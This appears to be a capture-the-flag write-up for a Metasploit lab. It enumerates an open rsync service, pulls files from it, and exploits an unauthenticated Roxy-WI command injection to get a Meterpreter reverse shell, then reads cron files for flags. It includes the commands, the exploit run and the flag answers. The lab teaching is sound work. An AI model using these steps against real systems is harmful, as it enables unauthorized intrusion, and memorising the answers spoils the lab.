The Metasploit Framework CTF 2
Overview¶
Linux-based systems are frequently targeted in penetration tests due to their prevalence in server environments. This lab focuses on using the Metasploit Framework (MSF) to exploit misconfigured services and vulnerable applications on Linux systems. Participants will leverage MSF to enumerate services, explore file systems, and exploit web applications to achieve shell access.
In this lab environment, you will have GUI access to a Kali Linux machine. Two machines are accessible at target1.ine.local and target2.ine.local.
Objective: Using various exploration techniques, complete the following tasks to capture the associated flags:
Flag 1: Enumerate the open port using Metasploit, and inspect the RSYNC banner closely; it might reveal something interesting.
Flag 2: The files on the RSYNC server hold valuable information. Explore the contents to find the flag.
Flag 3: Try exploiting the webapp to gain a shell using Metasploit on target2.ine.local.
Flag 4: Automated tasks can sometimes leave clues. Investigate scheduled jobs or running processes to uncover the hidden flag.
Writeup¶
Flag 1¶
We open Metasploit and run an nmap scan. We find only one open port:
msf6 > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
192.167.25.3 873 tcp rsync open protocol version 31
msf6 auxiliary(scanner/rsync/modules_list) > rsync rsync://target1.ine.local
[*] exec: rsync rsync://target1.ine.local
backupwscohen FLAG1_***
Answer
5605f4de3653422ab2ec051078582135
Flag 2¶
We found the backupwscohen. Let's see what it contains.
msf6 auxiliary(scanner/rsync/modules_list) > rsync rsync://target1.ine.local/backupwscohen
[*] exec: rsync rsync://target1.ine.local/backupwscohen
drwxr-xr-x 4,096 2025/04/08 19:45:58 .
-rw-r--r-- 20 2024/10/28 15:05:40 TPSData.txt
-rw-r--r-- 25 2024/10/28 15:05:40 office_staff.vhd
-rw-r--r-- 39 2025/04/08 19:45:58 pii_data.xlsx
We download the files using the -avz option.
The vhd file is a backup, the xlsx file does not open, and the txt file does not contain much. Let's unzip the xlsx file.
┌──(root㉿INE)-[~]
└─# unzip -l pii_data.xlsx -d extract
caution: not extracting; -d ignored
Archive: pii_data.xlsx
End-of-central-directory signature not found. Either this file is not
a zipfile, or it constitutes one disk of a multi-part archive. In the
latter case the central directory and zipfile comment will be found on
the last disk(s) of this archive.
unzip: cannot find zipfile directory in one of pii_data.xlsx or
pii_data.xlsx.zip, and cannot find pii_data.xlsx.ZIP, period.
Answer
d1b8eee3b2d94346933e21ccf84f4f4f
Flag 3¶
We run an nmap scan on target2.ine.local
msf6 auxiliary(scanner/rsync/modules_list) > db_nmap -sC -sV target2.ine.local
[*] Nmap: Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-08 20:12 IST
[*] Nmap: Nmap scan report for target2.ine.local (192.167.25.4)
[*] Nmap: Host is up (0.000024s latency).
[*] Nmap: Not shown: 998 closed tcp ports (reset)
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
[*] Nmap: |_http-server-header: Apache/2.4.52 (Ubuntu)
[*] Nmap: |_http-title: Roxy-WI
[*] Nmap: 443/tcp open ssl/http Apache httpd 2.4.52
[*] Nmap: |_http-server-header: Apache/2.4.52 (Ubuntu)
[*] Nmap: |_ssl-date: TLS randomness does not represent time
[*] Nmap: | tls-alpn:
[*] Nmap: |_ http/1.1
[*] Nmap: | ssl-cert: Subject: commonName=*.roxy-wi.org/organizationName=Roxy-WI/stateOrProvinceName=Almaty/countryName=US
[*] Nmap: | Not valid before: 2022-07-29T05:20:44
[*] Nmap: |_Not valid after: 2050-12-14T05:20:44
[*] Nmap: |_http-title: Roxy-WI
[*] Nmap: MAC Address: 02:42:C0:A7:19:04 (Unknown)
[*] Nmap: Service Info: Host: roxy-wi.example.com
[*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 13.76 seconds
Roxy-WI. Let's check if there are known vulnerabilities. msf6 auxiliary(scanner/rsync/modules_list) > search Roxy_wi
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/http/roxy_wi_exec 2022-07-06 excellent Yes Roxy-WI Prior to 6.1.1.0 Unauthenticated Command Injection RCE
1 \_ target: Unix (In-Memory) . . . .
2 \_ target: Linux (Dropper) . . . .
Interact with a module by name or index. For example info 2, use 2 or use exploit/linux/http/roxy_wi_exec
After interacting with a module you can manually set a TARGET with set TARGET 'Linux (Dropper)'
msf6 auxiliary(scanner/rsync/modules_list) > use 0
msf6 exploit(linux/http/roxy_wi_exec) > run
[*] Started reverse TCP handler on 192.167.25.2:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.167.25.4:443 is vulnerable!
[*] 192.167.25.4:443 is vulnerable!
[+] The target is vulnerable. The device responded to exploitation with a 200 OK and test command successfully executed.
[*] Exploiting...
[*] Sending stage (24772 bytes) to 192.167.25.4
[*] Meterpreter session 1 opened (192.167.25.2:4444 -> 192.167.25.4:38984) at 2025-04-08 20:14:41 +0530
meterpreter > sysinfo
Computer : target2.ine.local
OS : Linux 6.8.0-40-generic #40-Ubuntu SMP PREEMPT_DYNAMIC Fri Jul 5 10:34:03 UTC 2024
Architecture : x64
Meterpreter : python/linux
meterpreter > cd /
meterpreter > ls
Listing: /
==========
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100755/rwxr-xr-x 0 fil 2025-04-08 19:45:56 +0530 .dockerenv
040755/rwxr-xr-x 4096 dir 2022-07-29 11:01:41 +0530 bin
040755/rwxr-xr-x 4096 dir 2022-04-18 15:58:59 +0530 boot
040755/rwxr-xr-x 340 dir 2025-04-08 19:45:56 +0530 dev
040755/rwxr-xr-x 4096 dir 2025-04-08 19:45:56 +0530 etc
100644/rw-r--r-- 39 fil 2025-04-08 19:45:56 +0530 flag.txt
040755/rwxr-xr-x 4096 dir 2022-04-18 15:58:59 +0530 home
040755/rwxr-xr-x 4096 dir 2022-07-28 19:03:58 +0530 lib
040755/rwxr-xr-x 4096 dir 2022-05-31 21:12:11 +0530 lib32
040755/rwxr-xr-x 4096 dir 2022-05-31 21:13:16 +0530 lib64
040755/rwxr-xr-x 4096 dir 2022-05-31 21:12:11 +0530 libx32
040755/rwxr-xr-x 4096 dir 2022-05-31 21:12:12 +0530 media
040755/rwxr-xr-x 4096 dir 2022-05-31 21:12:12 +0530 mnt
040755/rwxr-xr-x 4096 dir 2022-05-31 21:12:12 +0530 opt
040555/r-xr-xr-x 0 dir 2025-04-08 19:45:56 +0530 proc
040700/rwx------ 4096 dir 2022-07-28 19:09:04 +0530 root
040755/rwxr-xr-x 4096 dir 2025-04-08 19:46:09 +0530 run
040755/rwxr-xr-x 4096 dir 2022-07-28 19:03:45 +0530 sbin
040755/rwxr-xr-x 4096 dir 2022-05-31 21:12:12 +0530 srv
040555/r-xr-xr-x 0 dir 2024-08-15 21:22:53 +0530 sys
041777/rwxrwxrwx 4096 dir 2025-04-08 19:46:09 +0530 tmp
040755/rwxr-xr-x 4096 dir 2022-05-31 21:12:12 +0530 usr
040755/rwxr-xr-x 4096 dir 2022-07-28 19:02:55 +0530 var
meterpreter > cat flag.txt
Answer
5f21b11d6df44853b531d7ed3dfbb954
Flag 4¶
Running crontab -l shows nothing. Let's check the /etc/cron.d folder.
www-data@target2:/etc/cron.d$ ls
e2scrub_all
www-data-cron
cat e2scrub_all
www-data@target2:/etc/cron.d$ 30 3 * * 0 root test -e /run/systemd/system || SERVICE_MODE=1 /usr/lib/x86_64-linux-gnu/e2fsprogs/e2scrub_all_cron
10 3 * * * root test -e /run/systemd/system || SERVICE_MODE=1 /sbin/e2scrub_all -A -r
www-data@target2:/etc/cron.d$ cat www-data-cron
www-data@target2:/etc/cron.d$ * * * * * www-data echo "FLAG4_****"
Answer
40817d4376354af291507611917209c2